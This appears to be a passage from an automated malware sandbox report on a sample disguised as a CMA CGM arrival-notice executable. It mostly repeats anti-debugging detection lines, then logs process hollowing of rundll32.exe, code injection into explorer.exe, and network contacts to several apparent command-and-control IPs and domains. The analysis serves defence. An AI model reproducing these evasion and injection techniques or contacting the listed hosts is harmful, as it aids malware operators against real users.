Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E6C0A mov eax, dword ptr fs:[00000030h] 14_2_048E6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04934015 mov eax, dword ptr fs:[00000030h] 14_2_04934015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04934015 mov eax, dword ptr fs:[00000030h] 14_2_04934015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h] 14_2_048E7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h] 14_2_048E7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h] 14_2_048E7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493740D mov eax, dword ptr fs:[00000030h] 14_2_0493740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493740D mov eax, dword ptr fs:[00000030h] 14_2_0493740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493740D mov eax, dword ptr fs:[00000030h] 14_2_0493740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489BC2C mov eax, dword ptr fs:[00000030h] 14_2_0489BC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A44B mov eax, dword ptr fs:[00000030h] 14_2_0489A44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04880050 mov eax, dword ptr fs:[00000030h] 14_2_04880050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04880050 mov eax, dword ptr fs:[00000030h] 14_2_04880050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FC450 mov eax, dword ptr fs:[00000030h] 14_2_048FC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FC450 mov eax, dword ptr fs:[00000030h] 14_2_048FC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04922073 mov eax, dword ptr fs:[00000030h] 14_2_04922073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488746D mov eax, dword ptr fs:[00000030h] 14_2_0488746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04931074 mov eax, dword ptr fs:[00000030h] 14_2_04931074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488C182 mov eax, dword ptr fs:[00000030h] 14_2_0488C182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A185 mov eax, dword ptr fs:[00000030h] 14_2_0489A185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489FD9B mov eax, dword ptr fs:[00000030h] 14_2_0489FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489FD9B mov eax, dword ptr fs:[00000030h] 14_2_0489FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04892990 mov eax, dword ptr fs:[00000030h] 14_2_04892990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048935A1 mov eax, dword ptr fs:[00000030h] 14_2_048935A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E69A6 mov eax, dword ptr fs:[00000030h] 14_2_048E69A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048961A0 mov eax, dword ptr fs:[00000030h] 14_2_048961A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048961A0 mov eax, dword ptr fs:[00000030h] 14_2_048961A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h] 14_2_04891DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h] 14_2_04891DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h] 14_2_04891DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04918DF1 mov eax, dword ptr fs:[00000030h] 14_2_04918DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0486B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0486B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0486B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048F41E8 mov eax, dword ptr fs:[00000030h] 14_2_048F41E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0487D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0487D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869100 mov eax, dword ptr fs:[00000030h] 14_2_04869100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869100 mov eax, dword ptr fs:[00000030h] 14_2_04869100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869100 mov eax, dword ptr fs:[00000030h] 14_2_04869100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938D34 mov eax, dword ptr fs:[00000030h] 14_2_04938D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov ecx, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h] 14_2_04894D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h] 14_2_04894D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h] 14_2_04894D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489513A mov eax, dword ptr fs:[00000030h] 14_2_0489513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489513A mov eax, dword ptr fs:[00000030h] 14_2_0489513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486AD30 mov eax, dword ptr fs:[00000030h] 14_2_0486AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048EA537 mov eax, dword ptr fs:[00000030h] 14_2_048EA537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A3D43 mov eax, dword ptr fs:[00000030h] 14_2_048A3D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h] 14_2_0488B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h] 14_2_0488B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E3540 mov eax, dword ptr fs:[00000030h] 14_2_048E3540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04887D50 mov eax, dword ptr fs:[00000030h] 14_2_04887D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C962 mov eax, dword ptr fs:[00000030h] 14_2_0486C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h] 14_2_0486B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h] 14_2_0486B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h] 14_2_0488C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h] 14_2_0488C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FFE87 mov eax, dword ptr fs:[00000030h] 14_2_048FFE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h] 14_2_0489D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h] 14_2_0489D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E46A7 mov eax, dword ptr fs:[00000030h] 14_2_048E46A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h] 14_2_04930EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h] 14_2_04930EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h] 14_2_04930EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0487AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0487AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489FAB0 mov eax, dword ptr fs:[00000030h] 14_2_0489FAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04892ACB mov eax, dword ptr fs:[00000030h] 14_2_04892ACB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938ED6 mov eax, dword ptr fs:[00000030h] 14_2_04938ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048936CC mov eax, dword ptr fs:[00000030h] 14_2_048936CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A8EC7 mov eax, dword ptr fs:[00000030h] 14_2_048A8EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491FEC0 mov eax, dword ptr fs:[00000030h] 14_2_0491FEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048776E2 mov eax, dword ptr fs:[00000030h] 14_2_048776E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048916E0 mov ecx, dword ptr fs:[00000030h] 14_2_048916E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04892AE4 mov eax, dword ptr fs:[00000030h] 14_2_04892AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h] 14_2_0486C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h] 14_2_0486C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h] 14_2_0486C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04898E00 mov eax, dword ptr fs:[00000030h] 14_2_04898E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04878A0A mov eax, dword ptr fs:[00000030h] 14_2_04878A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h] 14_2_0486AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h] 14_2_0486AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04883A1C mov eax, dword ptr fs:[00000030h] 14_2_04883A1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h] 14_2_0489A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h] 14_2_0489A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486E620 mov eax, dword ptr fs:[00000030h] 14_2_0486E620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491FE3F mov eax, dword ptr fs:[00000030h] 14_2_0491FE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048F4257 mov eax, dword ptr fs:[00000030h] 14_2_048F4257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487766D mov eax, dword ptr fs:[00000030h] 14_2_0487766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A927A mov eax, dword ptr fs:[00000030h] 14_2_048A927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h] 14_2_0491B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h] 14_2_0491B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938A62 mov eax, dword ptr fs:[00000030h] 14_2_04938A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h] 14_2_04871B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h] 14_2_04871B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491D380 mov ecx, dword ptr fs:[00000030h] 14_2_0491D380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04878794 mov eax, dword ptr fs:[00000030h] 14_2_04878794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0492138A mov eax, dword ptr fs:[00000030h] 14_2_0492138A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489B390 mov eax, dword ptr fs:[00000030h] 14_2_0489B390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h] 14_2_048E7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h] 14_2_048E7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h] 14_2_048E7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04935BA5 mov eax, dword ptr fs:[00000030h] 14_2_04935BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h] 14_2_048E53CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h] 14_2_048E53CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A37F5 mov eax, dword ptr fs:[00000030h] 14_2_048A37F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h] 14_2_0489A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h] 14_2_0489A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0492131B mov eax, dword ptr fs:[00000030h] 14_2_0492131B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493070D mov eax, dword ptr fs:[00000030h] 14_2_0493070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493070D mov eax, dword ptr fs:[00000030h] 14_2_0493070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488F716 mov eax, dword ptr fs:[00000030h] 14_2_0488F716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h] 14_2_048FFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h] 14_2_048FFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h] 14_2_04864F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h] 14_2_04864F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489E730 mov eax, dword ptr fs:[00000030h] 14_2_0489E730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486DB40 mov eax, dword ptr fs:[00000030h] 14_2_0486DB40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487EF40 mov eax, dword ptr fs:[00000030h] 14_2_0487EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938B58 mov eax, dword ptr fs:[00000030h] 14_2_04938B58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486F358 mov eax, dword ptr fs:[00000030h] 14_2_0486F358
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486DB60 mov ecx, dword ptr fs:[00000030h] 14_2_0486DB60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487FF60 mov eax, dword ptr fs:[00000030h] 14_2_0487FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h] 14_2_04893B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h] 14_2_04893B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938F6A mov eax, dword ptr fs:[00000030h] 14_2_04938F6A
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078CE61 LdrInitializeThunk, 0_2_0078CE61

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.111.236.6 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.microsoftjob.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.wxsjykj.com
Source: C:\Windows\explorer.exe Domain query: www.everythingswallow.com
Source: C:\Windows\explorer.exe Domain query: www.acooll.com
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.priorpublic.com
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.117 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 54.65.172.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.taylormakeyourlife.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.beckyhartpcpublishers.com
Source: C:\Windows\explorer.exe Domain query: www.rlmwebcreations.com
Source: C:\Windows\explorer.exe Domain query: www.dominionhavanese.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 10E0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
